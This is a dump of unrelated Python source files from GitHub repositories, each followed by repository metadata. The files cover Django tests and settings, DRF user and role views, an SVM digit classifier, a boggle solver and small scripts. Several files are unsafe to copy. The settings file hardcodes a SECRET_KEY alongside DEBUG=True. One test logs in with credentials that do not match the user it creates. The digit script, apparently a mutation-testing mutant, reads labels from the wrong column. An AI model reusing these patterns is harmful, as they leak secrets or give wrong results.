self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, template_name='account/register.html')
self.assertIsInstance(response.context['form'], RegisterForm)
def test_register_create_user(self):
response = self.client.post(reverse('register'),
data={
'email': "test@test.com",
'password': "test",
'password2': "test",
},
follow=True)
self.assertEqual(response.status_code, 200)
class LoginViewTest(TestCase):
def test_login_success_redirect_user_home_page(self):
response = self.client.post(reverse('login'), data={'email': 'test@test.test', 'password': 'test'})
self.assertEqual(200, response.status_code)
class LogOutViewTest(TestCase):
def setUp(self):
self.user = UserModel.objects.create(
email='test@textcom',
password = 'test',
)
def tearDown(self):
self.user.delete()
def test_logout_success_redirect_index(self):
self.client.login(email="test@test.com", password='text')
response = self.client.get(reverse('logout'))
self.assertEqual(302, response.status_code)
|
[
"66394357+DimAntDim@users.noreply.github.com"
] |
66394357+DimAntDim@users.noreply.github.com
|
9a9a5e1a87e823fb31274cc803479e5f9f48c592
|
ce76b3ef70b885d7c354b6ddb8447d111548e0f1
|
/day_or_point/say_good_work.py
|
e57f94898800ec38a14522b3b0c3743ae46ef192
|
[] |
no_license
|
JingkaiTang/github-play
|
9bdca4115eee94a7b5e4ae9d3d6052514729ff21
|
51b550425a91a97480714fe9bc63cb5112f6f729
|
refs/heads/master
| 2021-01-20T20:18:21.249162
| 2016-08-19T07:20:12
| 2016-08-19T07:20:12
| 60,834,519
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 239
|
py
|
#! /usr/bin/env python
def use_few_part_over_bad_hand(str_arg):
important_number(str_arg)
print('thing')
def important_number(str_arg):
print(str_arg)
if __name__ == '__main__':
use_few_part_over_bad_hand('great_year')
|
[
"jingkaitang@gmail.com"
] |
jingkaitang@gmail.com
|
04f06111126887806589e20ae3df08a21ef35dab
|
683a90831bb591526c6786e5f8c4a2b34852cf99
|
/CodeSignal/Interview/Backtracking/2_WordBoggle.py
|
56777e11c7b04f10d9d347dd0cc392adb21fe6d6
|
[] |
no_license
|
dbetm/cp-history
|
32a3ee0b19236a759ce0a6b9ba1b72ceb56b194d
|
0ceeba631525c4776c21d547e5ab101f10c4fe70
|
refs/heads/main
| 2023-04-29T19:36:31.180763
| 2023-04-15T18:03:19
| 2023-04-15T18:03:19
| 164,786,056
| 8
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,514
|
py
|
import copy
# https://app.codesignal.com/interview-practice/task/v3uf4PGocp2CH62nn/description
# Tag(s): Backtracking, recursion
def print_board(board):
for row in board:
print(row)
deltas = [
(-1, 0), (-1, -1), (-1, 1), (0, -1),
(0, 1), (1, 0), (1, -1), (1, 1)
]
def explore(board, word, i, j, k):
if i < 0 or i >= len(board) or j < 0 or j >= len(board[0]):
return False
if board[i][j] == '-' or k >= len(word):
return False
if board[i][j] != word[k]:
return False
original_chr = board[i][j]
board[i][j] = '-'
if k == (len(word)-1):
return True
ans = False
for delta in deltas:
if explore(board, word, i+delta[0], j+delta[1], k+1):
ans = True
break
board[i][j] = original_chr # backtracking
return ans
def wordBoggle(board, words):
ans = []
for word in words:
for i in range(len(board)):
for j in range(len(board[i])):
if board[i][j] == word[0]:
tmp_board = copy.deepcopy(board)
if explore(tmp_board, word, i, j, 0):
ans.append(word)
break
else:
continue
break
ans.sort()
return ans
if __name__ == '__main__':
board = []
rows = int(input())
for _ in range(rows):
x = input().split()
board.append(x)
words = input().split()
print(wordBoggle(board, words))
|
[
"davbetm@gmail.com"
] |
davbetm@gmail.com
|
8137538c751572157b1a44dc0c0f97368389f271
|
f9cce83d8259f53686ed545cf301d6e72258ea90
|
/mynewproject/mynewproject/settings.py
|
2a6d9179c5e65c306eeb698650876c6ff4e54220
|
[] |
no_license
|
ir4y/docker-workshop
|
dc649e53598d9fc237348aab64ccd3b5141bc12e
|
9e6f7f2445bf4b4ac1c416f83488a8d840d64db6
|
refs/heads/master
| 2020-12-24T22:06:12.190270
| 2016-04-22T20:53:22
| 2016-04-22T20:53:22
| 56,765,105
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,123
|
py
|
"""
Django settings for mynewproject project.
Generated by 'django-admin startproject' using Django 1.9.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
import dj_database_url
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '1w60yw+fb4t2ni1=u1-2en59e40=kb44yms*!7z2j@2#85ths6'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mynewproject.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mynewproject.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': dj_database_url.config(),
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
|
[
"ir4y.ix@gmail.com"
] |
ir4y.ix@gmail.com
|
15bc8407519a5501e2d0687a01ae6c171ec545ed
|
051c3ee44478265c4510530888335335ec9f7fdf
|
/ML_Applications/SVM/experiments_(MRs_on_Mutants)/digitsData/RBFKernel/Mutants/MR1-permuteFeatures/r5/DigitRecognitionApp_5.py
|
99860b4f108cd70b0936ce937a2f1954c2cf2a6a
|
[] |
no_license
|
PinjiaHe/VerifyML
|
b581c016012c62d8439adfce0caef4f098b36d5e
|
3bd7c49e45720c1cdfe0af4ac7dd35b201056e65
|
refs/heads/master
| 2020-03-25T19:40:39.996370
| 2018-01-30T08:58:58
| 2018-01-30T08:58:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,197
|
py
|
"""
Created on Fri May 26 15:20:01 2017
#Digit Recognition for V & V
#Following note added by Raghu
Note:
1. The actual digits data from the http://archive.ics.uci.edu/ml/datasets/Pen-Based+Recognition+of+Handwritten+Digits is different than the one referred in this sklearn example
2. For more info, refer this link http://scikit-learn.org/stable/modules/generated/sklearn.datasets.load_digits.html and the above one.
3. The digits data referred by this Sklearn example can be downloaded from the following link.
https://github.com/scikit-learn/scikit-learn/blob/master/sklearn/datasets/data/digits.csv.gz
"""
import matplotlib.pyplot as plt
from sklearn import datasets, svm, metrics
import numpy as np
import _pickle as cPickle
digits = np.loadtxt('digits_Train_MR1_PermFeatures.csv', delimiter=',')
digits_images_flat = digits[:,:(-1)]
digits_images = digits_images_flat.view()
digits_images.shape = ((-1), 8, 8)
digits_target = digits[:,(-1)].astype(np.int)
digits_test = np.loadtxt('digits_Test_MR1_PermFeatures.csv', delimiter=',')
digits_test_images_flat = digits_test[:,:(-1)]
digits_test_images = digits_test_images_flat.view()
digits_test_images.shape = ((-1), 8, 8)
digits_test_target = digits_test[:,1].astype(np.int)
images_and_labels = list(zip(digits_images, digits_target))
n_samples = len(digits_images)
classifier = svm.SVC(gamma=0.001)
classifier.fit(digits_images_flat, digits_target)
expected = digits_test_target
predicted = classifier.predict(digits_test_images_flat)
print('Classification report for classifier %s:\n%s\n' % (
classifier, metrics.classification_report(expected, predicted)))
print('Confusion matrix:\n%s' % metrics.confusion_matrix(expected, predicted))
print("accuracy:", metrics.accuracy_score(expected, predicted))
images_and_predictions = list(zip(digits_test_images, predicted))
np.savetxt('output.txt', classifier.decision_function(digits_test_images_flat))
outputData = {'data_array': metrics.confusion_matrix(expected, predicted)}
with open('output.pkl', 'wb') as outputFile:
cPickle.dump(outputData, outputFile)
with open('model.pkl', 'wb') as modelFile:
cPickle.dump(classifier, modelFile)
|
[
"anurag.bms@gmail.com"
] |
anurag.bms@gmail.com
|
53f18e3d6324766217bd33e5f7c5df5c74d01171
|
7e98a3fc246547cc93ce2a93f39410aac38f8dd3
|
/bag/tests/test_urls.py
|
c6fc2dc10f4a6c80e6986f82a633ff10c1e9cdec
|
[] |
no_license
|
kydzoster/huntinteriors
|
53b5d064f05010c71c70d72a6148494226980287
|
4439c652d74d9b5553abc67d4bbac73b33b42336
|
refs/heads/main
| 2023-02-04T03:14:50.250492
| 2020-12-16T13:22:31
| 2020-12-16T13:22:31
| 301,401,449
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,063
|
py
|
from django.test import TestCase
from django.urls import reverse, resolve
from bag.views import view_bag, add_to_bag, adjust_bag, remove_from_bag,\
success
class TestUrls(TestCase):
def test_view_bag_url_is_resolved(self):
url = reverse('view_bag')
print(resolve(url))
self.assertEquals(resolve(url).func, view_bag)
def test_add_to_bag_url_is_resolved(self):
url = reverse('add_to_bag', args=[1])
print(resolve(url))
self.assertEquals(resolve(url).func, add_to_bag)
def test_adjust_bag_url_is_resolved(self):
url = reverse('adjust_bag', args=[1])
print(resolve(url))
self.assertEquals(resolve(url).func, adjust_bag)
def test_remove_from_bag_url_is_resolved(self):
url = reverse('remove_from_bag', args=[1])
print(resolve(url))
self.assertEquals(resolve(url).func, remove_from_bag)
def test_success_url_is_resolved(self):
url = reverse('success')
print(resolve(url))
self.assertEquals(resolve(url).func, success)
|
[
"kydzoster@gmail.com"
] |
kydzoster@gmail.com
|
4511418ac6a1ba4d051b347cf150a798e4753afa
|
644d9ef18713e4cb5d4c3b53301bd7276dcdf477
|
/api/programs/serializers/courses/__init__.py
|
0420ef42cac21787e67976e0cca760e59a01bd92
|
[] |
no_license
|
alexhernandez-git/django-classline
|
6cb5bcd268248999e18037f58c4ed30012d51915
|
49fcf0c6d735a56eaebc17d04be52dab91ca4c3a
|
refs/heads/master
| 2023-03-18T07:10:08.770066
| 2021-03-04T22:24:09
| 2021-03-04T22:24:09
| 287,985,028
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 372
|
py
|
from .languages import *
from .prices import *
from .courses import *
from .blocks import *
from .block_tracks import *
from .items import *
from .item_tracks import *
from .contents import *
from .item_questions import *
from .item_answers import *
from .items_viewed import *
from .materials import *
from .course_users_data import *
from .students import *
|
[
"vlexhndz@gmail.com"
] |
vlexhndz@gmail.com
|
81b3c1a604d12b227bc601a62060b3b20494c030
|
c03d7a4e03c581d4be98b6363003cddb9c213ec0
|
/registration/migrations/0017_auto_20181122_2208.py
|
3e33472466085ca31c4186c48ec9f60a73f4368e
|
[] |
no_license
|
hernandavidc/plataforma
|
b333e4f06290713072d8dc609c27d4ce8af1d9df
|
4316e2a59db76e74f1e6106958631ad4a7a653c7
|
refs/heads/master
| 2020-04-06T17:08:21.019355
| 2019-04-09T04:41:00
| 2019-04-09T04:41:00
| 157,648,096
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 641
|
py
|
# Generated by Django 2.1 on 2018-11-23 03:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('registration', '0016_auto_20180910_1209'),
]
operations = [
migrations.AlterField(
model_name='veterinaria',
name='latitud',
field=models.DecimalField(blank=True, decimal_places=8, max_digits=9, null=True),
),
migrations.AlterField(
model_name='veterinaria',
name='longitud',
field=models.DecimalField(blank=True, decimal_places=8, max_digits=9, null=True),
),
]
|
[
"hernandavidc@hotmail.com"
] |
hernandavidc@hotmail.com
|
5d0900423f187a722e7b4784a10d242cb508eaa3
|
f4309766d0292d6ae06344221b667603fda206ec
|
/backend/apps/user/views.py
|
f23bb486e4b7eca9c5f74b758711e4d8d7606f82
|
[] |
no_license
|
tom2jack/Journey
|
dff0181ef8939a9edf52987a2439563ca0c4342d
|
cb7bbca759c3d27815fde0d1697c2184b31b2aac
|
refs/heads/master
| 2022-02-23T05:43:58.602808
| 2019-10-08T08:27:36
| 2019-10-08T08:27:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,632
|
py
|
from django.shortcuts import render
from rest_framework import status
from rest_framework.response import Response
from rest_framework import viewsets
from django.db.models import Q
from rest_framework import filters
from user.models import *
from user.serializers import *
from user.permissions import CustomerPremission
import random, string
def random_str(randomlength=10):
a = list(string.ascii_letters)
random.shuffle(a)
return ''.join(a[:randomlength])
class UserGroupViewSet(viewsets.ModelViewSet):
"""
list:
用户组列表.
create:
创建用户组.
delete:
删除用户组.
update:
修改用户组.
"""
queryset = UserGroup.objects.all().order_by('id')
serializer_class = UserGroupSerializer
filter_backends = (filters.SearchFilter, filters.OrderingFilter,)
search_fields = ('group','comment',)
ordering_fields = ('id',)
# 权限相关
permission_classes = [CustomerPremission,]
module_perms = ['user:usergroup']
def update(self, request, *args, **kwargs):
partial = kwargs.pop('partial', False)
userselected = request.data['userselected']
instance = self.get_object()
serializer = self.get_serializer(instance, data=request.data, partial=partial)
serializer.is_valid(raise_exception=True)
userlist = Users.objects.filter(Q(id__in=userselected))
instance.user_group.set(userlist,bulk=True)
return Response(serializer.data)
class MenuViewSet(viewsets.ModelViewSet):
"""
list:
菜单列表.
create:
创建菜单.
delete:
删除菜单.
update:
修改菜单.
"""
queryset = Menu.objects.all().order_by('id')
serializer_class = MenuSerializer
filter_backends = (filters.SearchFilter, filters.OrderingFilter,)
# search_fields = ('mtype',)
ordering_fields = ('id',)
# 权限相关
permission_classes = [CustomerPremission,]
module_perms = ['user:menu']
def list(self, request, *args, **kwargs):
results = []
queryset = self.filter_queryset(self.get_queryset())
for i in queryset.filter(Q(mtype=0)):
results.append({'id':i.id,'name':i.name,'parent_id':i.parent_id,'url':i.url,'perms':i.perms,'mtype':i.mtype,'icon':i.icon,'del_flag':i.del_flag,'children':[]})
for item in results:
for i in queryset.filter(Q(mtype=1)&Q(parent_id=item['id'])):
item['children'].append({'id':i.id,'name':i.name,'parent_id':i.parent_id,'url':i.url,'perms':i.perms,'mtype':i.mtype,'icon':i.icon,'del_flag':i.del_flag,'children':[]})
for item in results:
if (len(item['children']) > 0):
for node in item['children']:
for i in queryset.filter(Q(mtype=2)&Q(parent_id=node['id'])):
node['children'].append({'id':i.id,'name':i.name,'parent_id':i.parent_id,'url':i.url,'perms':i.perms,'mtype':i.mtype,'icon':i.icon,'del_flag':i.del_flag})
# serializer = self.get_serializer(queryset, many=True)
return Response(results)
class RoleViewSet(viewsets.ModelViewSet):
"""
list:
角色列表.
create:
创建角色.
delete:
删除角色.
update:
修改角色.
"""
queryset = Role.objects.all().order_by('id')
serializer_class = RoleSerializer
filter_backends = (filters.SearchFilter, filters.OrderingFilter,)
search_fields = ('name')
ordering_fields = ('id',)
# 权限相关
permission_classes = [CustomerPremission,]
module_perms = ['user:role']
def update(self, request, *args, **kwargs):
edittype = request.data['type']
partial = kwargs.pop('partial', False)
instance = self.get_object()
serializer = self.get_serializer(instance, data=request.data, partial=partial)
serializer.is_valid(raise_exception=True)
if (edittype == 'role_perms'):
permsselected = request.data['permsselected']
instance.menu.set(permsselected)
elif (edittype == 'role_users'):
userselected = request.data['userselected']
instance.user_role.set(userselected)
return Response(serializer.data)
class UsersViewSet(viewsets.ModelViewSet):
"""
list:
用户列表.
create:
创建用户.
delete:
删除用户.
update:
修改用户.
"""
queryset = Users.objects.all().order_by('id')
serializer_class = UsersSerializer
filter_backends = (filters.SearchFilter, filters.OrderingFilter,)
search_fields = ('username','email',)
ordering_fields = ('id',)
# 权限相关
permission_classes = [CustomerPremission,]
module_perms = ['user:user']
def create(self, request, *args, **kwargs):
if (len(request.data['password']) == 0):
mailtolist = []
request.data['password'] = random_str()
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
username = request.data['username']
password = request.data['password']
useremail = request.data['email']
mailtolist.append(useremail)
userinfo = Users.objects.get(username=username)
userinfo.set_password(password)
userinfo.save()
headers = self.get_success_headers(serializer.data)
# maildata = {}
# maildata['username'] = username
# maildata['password'] = password
# send_mail(mailtolist,1,maildata)
return Response(request.data, status=status.HTTP_201_CREATED, headers=headers)
def update(self, request, *args, **kwargs):
if ('password' in request.data.keys()):
mailtolist = []
partial = kwargs.pop('partial', False)
instance = self.get_object()
serializer = self.get_serializer(instance, data=request.data, partial=partial)
serializer.is_valid(raise_exception=True)
self.perform_update(serializer)
if getattr(instance, '_prefetched_objects_cache', None):
# If 'prefetch_related' has been applied to a queryset, we need to
# forcibly invalidate the prefetch cache on the instance.
instance._prefetched_objects_cache = {}
username = request.data['username']
password = request.data['password']
useremail = request.data['email']
#邮件内容
maildata = {}
maildata['username'] = username
maildata['password'] = password
#发送用户邮箱
mailtolist.append(useremail)
userinfo = Users.objects.get(username=username)
userinfo.set_password(password)
userinfo.save()
# send_mail(mailtolist,2,maildata)
else:
partial = kwargs.pop('partial', False)
instance = self.get_object()
serializer = self.get_serializer(instance, data=request.data, partial=partial)
serializer.is_valid(raise_exception=True)
self.perform_update(serializer)
if getattr(instance, '_prefetched_objects_cache', None):
# If 'prefetch_related' has been applied to a queryset, we need to
# forcibly invalidate the prefetch cache on the instance.
instance._prefetched_objects_cache = {}
return Response(serializer.data)
|
[
"977983452@qq.com"
] |
977983452@qq.com
|
c334f9d5fe148729774e785a96feae949de4f060
|
5e48f770f975ea0ae166cd662576baa36150cb41
|
/booking/migrations/0002_auto_20170725_2313.py
|
c1abc8a5cb7e36b285b6bc51fe62541f7d726ae7
|
[] |
no_license
|
Ngahu/Booking
|
df5a7b2e346bf497bc340e4ee3e6e7184c40d235
|
3187bb4a34225364181f0409344457c43f20b338
|
refs/heads/master
| 2021-01-01T19:54:20.069252
| 2017-07-29T08:25:32
| 2017-07-29T08:25:32
| 98,717,395
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 449
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-07-25 23:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('booking', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='book',
name='travelling_persons',
field=models.IntegerField(default=1),
),
]
|
[
"jamaalaraheem@gmail.com"
] |
jamaalaraheem@gmail.com
|
9ed940e62e4b3bfdf9750564804b04975687106f
|
73c01a3f052f8ef63890ec3c2e28403ad41e9a71
|
/td/models/driver.py
|
cd23468080d6a1f5b364dd8199d0b29945d90f9f
|
[] |
no_license
|
Jokey90/aho
|
4c007c65c819efb726a732a8f36067c5a0226100
|
8bcd41e9ef7d40f07499429f385d4fec590636f6
|
refs/heads/master
| 2020-03-21T22:28:36.395996
| 2018-06-29T09:25:05
| 2018-06-29T09:25:05
| 139,128,834
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,159
|
py
|
from django.db import models
class Driver(models.Model):
from main.models import Employee
class Meta:
verbose_name = 'Водитель'
verbose_name_plural = 'Водители'
emp = models.OneToOneField(verbose_name='Сотрудник', to=Employee, blank=False, null=False)
comment = models.CharField(verbose_name='Комментарий', blank=True, null=True, default='', max_length=255)
license = models.CharField(verbose_name='Вод. удостоверение', blank=True, null=True, default='', max_length=100)
license_date = models.DateField(verbose_name='Вод. удостоверение до', blank=False, null=False)
phone = models.CharField(verbose_name='Телефон', blank=True, null=True, default='', max_length=100)
active = models.BooleanField(verbose_name='Активен', blank=False, null=False, default=True)
photo = models.FileField(verbose_name='Скан вод. удостоверения', blank=True, upload_to='scans/licenses/', null=True)
def short_name(self):
return self.emp.short_name()
def __str__(self):
return self.emp.short_name()
|
[
"Kishkurno_AS@dsdf.cds.ru"
] |
Kishkurno_AS@dsdf.cds.ru
|
fffc65720d6f0a1225f7ffb51fb0f9b5c0ebfc98
|
7ac223c9aaa46b2533e08928354f72dd03873e64
|
/rentals/migrations/0001_initial.py
|
47ae12267ae8e66afa4ec9c23d0eea29018c24b3
|
[] |
no_license
|
Kyeza/RentalMangementSystem
|
9f6e75ffe634510755dbe78fe74f4ef270b5bef5
|
862490d4be6683e40b81384eb4b7dadad35019cc
|
refs/heads/master
| 2023-04-30T06:20:11.281096
| 2019-05-23T20:40:29
| 2019-05-23T20:40:29
| 188,166,783
| 1
| 0
| null | 2023-04-21T20:31:55
| 2019-05-23T05:24:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,426
|
py
|
# Generated by Django 2.2.1 on 2019-05-23 09:53
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, null=True)),
],
),
migrations.CreateModel(
name='Property',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, null=True)),
('image', models.ImageField(default='img_default.png', upload_to='property_imgs')),
('description', models.TextField(blank=True, null=True)),
('address', models.CharField(blank=True, max_length=150, null=True)),
('price', models.DecimalField(decimal_places=2, max_digits=12, null=True)),
('date_listed', models.DateTimeField(default=django.utils.timezone.now)),
('category', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='rentals.Category')),
],
),
]
|
[
"kyezaarnold63@gmail.com"
] |
kyezaarnold63@gmail.com
|
5ef05dd99cd88c1d6387005f2eb546494a1bd520
|
fdc2fbb1b9e75a6ce5adacec29aae7482c999135
|
/_api/public_api/services/routes.py
|
f90cad4b74402610f779b7f832b7fd98866cebad
|
[
"MIT"
] |
permissive
|
bellyfat/membership_and_affiliate_api
|
b37411a1244fc7d6bf721b6d36ec87b57845169f
|
41fb9f5a0c37c1ac5636122c61e98ddaf9c569ff
|
refs/heads/master
| 2023-07-12T17:07:28.399407
| 2021-08-24T13:04:02
| 2021-08-24T13:04:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,532
|
py
|
"""
**Public facing Services API**
"""
__author__ = "mobius-crypt"
__email__ = "mobiusndou@gmail.com"
__twitter__ = "@blueitserver"
__github_repo__ = "https://github.com/freelancing-solutions/memberships-and-affiliate-api"
__github_profile__ = "https://github.com/freelancing-solutions/"
from typing import Optional
from flask import Blueprint, request, current_app
from config.exceptions import if_bad_request_raise, UnAuthenticatedError, error_codes
from security.api_authenticator import handle_api_auth
from views.services import ServicesView
services_public_api_bp = Blueprint('services_public_api', __name__)
@services_public_api_bp.route('/api/v1/public/service/<string:org_id>/<string:service_id>', methods=["GET"])
@handle_api_auth
def get_services(org_id: str, service_id: str) -> tuple:
"""
**public_services_api**
returns a service governed by organization_id and service_id
:param org_id:
:param service_id:
:return:
"""
service_view: ServicesView = ServicesView()
return service_view.get_service(service_id=service_id, organization_id=org_id)
@services_public_api_bp.route('/api/v1/public/services/<string:org_id>', methods=["GET"])
@handle_api_auth
def get_all_services(org_id: str) -> tuple:
"""
**public_services_api**
returns a service governed by organization_id and service_id
:param org_id:
:return:
"""
service_view: ServicesView = ServicesView()
return service_view.return_services(organization_id=org_id)
|
[
"mobiusndou@gmail.com"
] |
mobiusndou@gmail.com
|
ffcf8c9e3bd602c62149a42dac33d47fc5c7fa0a
|
4dd695521343d56ff943e8c1768343d7680714e3
|
/experiments/scripts_auto_closedset_braccent/config_iVector_400_fold1.py
|
34cd51f887e4c284adc8d7e44663401d7056f6b5
|
[] |
no_license
|
natharb/environment
|
ea659ee541f6473e92b5b30c549e52b66f47b280
|
86e6cee6e01d2370abeb7c55a2c8a15001735919
|
refs/heads/master
| 2021-09-28T02:39:02.222966
| 2018-11-13T12:03:34
| 2018-11-13T12:03:34
| 139,762,646
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,317
|
py
|
#!/usr/bin/env python
# vim: set fileencoding=utf-8 :
#Nathália Alves Rocha Batista (nathbapt@decom.fee.unicamp.br)
import sys
sys.path.insert(0, '.')
import bob.bio.spear
import bob.bio.gmm
import numpy
import scipy.spatial
temp_directory = './results/closedset_braccent/iVector/400/fold_1/temp/'
result_directory = './results/closedset_braccent/iVector/400/fold_1/results/'
sub_directory = 'subdirectory'
database = 'database_iVector_400_fold1.py'
groups = ['dev']
#groups = ['dev', 'eval']
preprocessor = bob.bio.spear.preprocessor.Energy_2Gauss(max_iterations = 10, convergence_threshold = 0.0005, variance_threshold = 0.0005, win_length_ms = 20., win_shift_ms = 10., smoothing_window = 10)
extractor = bob.bio.spear.extractor.Cepstral(win_length_ms = 25, win_shift_ms = 10, n_filters = 24 , dct_norm = False, f_min = 0, f_max = 4000, delta_win = 2, mel_scale = True, with_energy = True, with_delta = True, with_delta_delta = True, n_ceps = 19, pre_emphasis_coef = 0.97)
algorithm = bob.bio.gmm.algorithm.IVector(subspace_dimension_of_t = 400, tv_training_iterations = 10, update_sigma = True, use_whitening = True, use_lda = False, use_wccn = False, use_plda = False, lda_dim = 50, plda_dim_F = 50, plda_dim_G = 50, plda_training_iterations = 50, number_of_gaussians = 256)
parallel = 40
verbose = 2
|
[
"nathbapt@decom.fee.unicamp.br"
] |
nathbapt@decom.fee.unicamp.br
|
da3449f427e0b24db486c59bdd24e486619c9e1f
|
117f066c80f3863ebef74463292bca6444f9758a
|
/data_pulling/tax/example.py
|
4fdcefef7f117c22146461f85385ac5b612cdb24
|
[] |
no_license
|
cottrell/notebooks
|
c6de3842cbaeb71457d270cbe6fabc8695a6ee1b
|
9eaf3d0500067fccb294d064ab78d7aaa03e8b4d
|
refs/heads/master
| 2023-08-09T22:41:01.996938
| 2023-08-04T22:41:51
| 2023-08-04T22:41:51
| 26,830,272
| 3
| 1
| null | 2023-03-04T03:58:03
| 2014-11-18T21:14:23
|
Python
|
UTF-8
|
Python
| false
| false
| 1,854
|
py
|
import pandas as pd
import numpy.random as nr
import numpy as np
class PandasPiecewiseLinear():
# dodgy, thing to do piecewise opt
# this is not useful really, you would need to create some n-d simplex thing ... probably a package that does this
def __init__(self, x, y):
""" no extrap """
self.data = pd.Series(y, index=x)
assert np.diff(self.data.index.values).min() > 0
def _reindexed_data(self, x):
return self.data.reindex(x).interpolate(method='linear')
def __mul__(self, other):
data = self.data * other
return PandasPiecewiseLinear(data.index.values, data.values)
def __add__(self, other):
a = self.data.index.values
b = other.data.index.values
assert a.min() == b.min()
assert a.max() == b.max()
x = np.unique(np.hstack([a, b]))
x.sort()
out = self._reindexed_data(x) + other._reindexed_data(x)
return PandasPiecewiseLinear(out.index.values, out.values)
def __call__(self, x):
return si.interp1d(self.data.index.values, self.data.values)(x)
def __sub__(self, other):
return self.__add__(other * -1)
def __repr__(self):
print('PandasPiecewiseLinear')
return self.data.__repr__()
def argmax(self):
return self.data.idxmax()
# test
# n = 5
# xa = sorted([0] + nr.rand(n).tolist() + [1])
# xb = sorted([0] + nr.rand(n).tolist() + [1])
# a = PandasPiecewiseLinear(xa, list(nr.randn(n + 2)))
# b = PandasPiecewiseLinear(xb, list(nr.randn(n + 2)))
# c = a + b
# c = a - b
# print(c)
import do
F = PandasPiecewiseLinear(do.F.x, do.F.y)
F_ni = PandasPiecewiseLinear(do.F_ni.x, do.F_ni.y)
G = PandasPiecewiseLinear(do.G.x, do.G.y)
F_ttl = F + F_ni
x0 = PandasPiecewiseLinear([0, do._max_x], [1, 1])
x1 = PandasPiecewiseLinear([0, do._max_x], [0, do._max_x])
|
[
"cottrell@users.noreply.github.com"
] |
cottrell@users.noreply.github.com
|
e75b8889a6c0498c6a7e72f280cba8ce56c72660
|
3249577773cf18e5c09ea36de62477ddb43b662b
|
/Python/django/user_login/apps/dojo_ninjas/views.py
|
6f0f71058c7279e806c4f9481c8dec2b16a697ee
|
[] |
no_license
|
HollinRoberts/code
|
5394abe2a7c42bbbe83d8f64a99c50a52f05792b
|
8026522ab169c4174037fdf1b271de60b75d79bf
|
refs/heads/master
| 2021-01-01T16:12:11.674680
| 2017-10-18T21:08:10
| 2017-10-18T21:08:10
| 97,786,418
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 190
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render
def index(request):
print 'here'
return render(request,'dojo_ninjas/index.html')
|
[
"hollinroberts@gmail.com"
] |
hollinroberts@gmail.com
|
41d999a5e04ca98fc1bea1f05e638bc5a92839e2
|
b891f38eb12eeafdbcec9deee2320acfaac3a7ad
|
/0x0A-python-inheritance/100-my_int.py
|
